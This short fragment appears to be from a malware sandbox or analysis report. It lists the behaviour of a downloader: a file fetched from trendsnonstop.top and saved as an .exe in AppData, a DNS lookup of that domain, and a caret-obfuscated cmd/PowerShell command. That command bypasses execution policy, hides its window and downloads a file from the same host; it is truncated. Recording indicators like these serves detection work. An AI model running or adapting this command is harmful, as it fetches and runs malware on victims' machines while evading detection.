Technical Information
- http://trendsnonstop.top/search.php as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oweRS^HElL.Exe -E^X^Ec^uT^Io^N^P^O^lIcy byP^A^ss -noPRoFiL^e ^-^WINDOw^sTYlE ^h^iDdeN^ (N^ew^-obj^eCt ^SY^S^TeM^.n^et^.WeB^CLIEn^t).^DoWnLOA^DFi^LE('http://trendsnonstop.top/s...
- DNS ASK tr####nonstop.top
- '<SYSTEM32>\cmd.exe' /c "p^oweRS^HElL.Exe -E^X^Ec^uT^Io^N^P^O^lIcy byP^A^ss -noPRoFiL^e ^-^WINDOw^sTYlE ^h^iDdeN^ (N^ew^-obj^eCt ^SY^S^TeM^.n^et^.WeB^CLIEn^t).^DoWnLOA^DFi^LE('http://trendsnonstop.top/s...' (with hidden window)